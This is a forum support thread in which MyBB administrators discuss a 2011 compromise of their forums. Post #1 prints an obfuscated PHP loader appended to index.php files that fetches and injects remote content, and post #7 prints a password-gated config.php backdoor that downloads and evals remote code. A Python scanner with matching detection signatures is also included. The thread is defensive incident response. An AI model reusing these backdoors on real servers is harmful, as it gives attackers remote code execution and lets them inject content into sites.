Not Solved [Security] iframe injection in index.php files....
#1
So a few users have been complaining that Norton was throwing alerts when they would log in to the forum. One guy actually remembered to save the alert and post it up so I could see what it said, and here's what we have:

"Web Attack: Mass Iframe Injection Attack 2; An intrusion attempt by myforumurl.com was blocked; Mon.,Oct 17, 8:42 AM; (IP address removed)."

Anyhow, while running the file verification tool, I noticed that all of the index.php files within MyBB had the following PHP code added to the very bottom of the file:

<?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host = $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref; $tmp = file_get_contents($url); echo $tmp; ?>

That code was added to the following files:

/index.php
/admin/index.php
/admin/modules/home/index.php
/archive/index.php
#2
Hmm, re-upload fresh files from the latest MyBB download package (see also 1.6.4 Security Vulnerability).
#3
(2011-10-17, 08:39 PM) ranjani Wrote: Hmm, re-upload fresh files from the latest MyBB download package (see also 1.6.4 Security Vulnerability).

Yep, I just did that for every forum I run.

#4
^ Someone also suggested checking config.php for any malicious code. Of course, it is generally not writeable; yet...
#5
(2011-10-17, 08:50 PM) ranjani Wrote: ^ Someone also suggested checking config.php for any malicious code. Of course, it is generally not writeable; yet...

It's writable by default, and some folks have had it compromised as well.
Lost interest, sold my sites, will browse here once in a while. It's been fun.
#6
^ Though off topic, I do not understand the reason for using CHMOD 666 for config.php.
Some use 444!! AND make it writeable only when it is necessary, then put back CHMOD 444!!
#7
Out of the 3 MyBB installations on my server, I did notice this code in 1 of the 3 config.php files:

if (isset($_GET['pingnow']) && isset($_GET['pass'])) {
    if ($_GET['pass'] == '4be5a36cbaca8ab9d2066debfe4e65c1') {
        if (($_GET['pingnow'] == 'exec') && (isset($_GET['file']))) {
            $ch = curl_init($_GET['file']);
            $fnm = md5(rand(0,100)).'.php';
            $fp = fopen($fnm, "w");
            curl_setopt($ch, CURLOPT_FILE, $fp);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_TIMEOUT, 5);
            curl_exec($ch);
            curl_close($ch);
            fclose($fp);
            echo "<SCRIPT LANGUAGE=\"JavaScript\">location.href='$fnm';</SCRIPT>";
        }
        if (($_GET['pingnow'] == 'eval') && (isset($_GET['file']))) {
            $ch = curl_init($_GET['file']);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_TIMEOUT, 5);
            $re = curl_exec($ch);
            curl_close($ch);
            eval($re);
        }
    }
}
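A small scanner, added here as an illustration (not MyBB's file verification tool and not any poster's code), that walks a forum tree for the two payload patterns quoted in this thread: the appended eval(base64_decode(...)) loader from #1 and the pingnow config.php backdoor above. It also flags a config.php left world-writable, the CHMOD 666 concern from #6. The sample tree it builds is constructed; it assumes inc/config.php as the config location and treats showthread.php as a clean file.

```python
import os
import re
import stat
import tempfile

# Signatures lifted from the payloads quoted in this thread: the appended
# eval(base64_decode(...)) loader that echoes a remote fetch, and the ?pingnow= backdoor.
SIGNATURES = {
    "eval_base64": re.compile(r"eval\s*\(\s*base64_decode\s*\("),
    "remote_fetch_echo": re.compile(r"file_get_contents\s*\(\s*\$url\s*\)\s*;\s*echo"),
    "pingnow_backdoor": re.compile(r"\$_GET\s*\[\s*'pingnow'\s*\]"),
}

def scan_file(path):
    """Return the names of every signature that matches the file's contents."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]

def scan_tree(root):
    """Map each suspicious .php file (relative to root) to its list of findings."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            hits = scan_file(path)
            # A config.php left at CHMOD 666 has the other-write bit set.
            if name == "config.php" and os.stat(path).st_mode & stat.S_IWOTH:
                hits.append("config_world_writable")
            if hits:
                findings[os.path.relpath(path, root)] = hits
    return findings

def build_sample_tree():
    """Constructed sample tree: a clean file, an injected index.php, a 666 backdoored config."""
    root = tempfile.mkdtemp()
    def put(rel, body, mode=0o644):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
        os.chmod(path, mode)
    put("showthread.php", "<?php\nrequire_once './global.php';\n")
    put("archive/index.php", "<?php\nrequire_once '../global.php';\n?>\n<?php $_X='...';"
        "eval(base64_decode('...'));$tmp = file_get_contents($url); echo $tmp; ?>")
    put("inc/config.php", "<?php\n$config['database']['type'] = 'mysqli';\n"
        "if (isset($_GET['pingnow'])&& isset($_GET['pass'])){ eval($re); }\n", 0o666)
    return root
```

Run scan_tree() against the real document root after taking a copy for forensics; a clean reinstall from the official package (as #2 recommends) should then produce no findings.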
#8
Also wanted to note that my showthread.php was infected...
#9
Every file on your site can be infected by this issue; new files can be created, and database access, etc. can all be compromised. It's an "open" exploit that lets most any code be executed.
#10
You have the EXACT same problem as me! I traced the injection to DrHouseNews.Orge.pl! See the two threads below:

http://community.mybb.com/thread-106302.html
http://community.mybb.com/thread-106212-page-2.html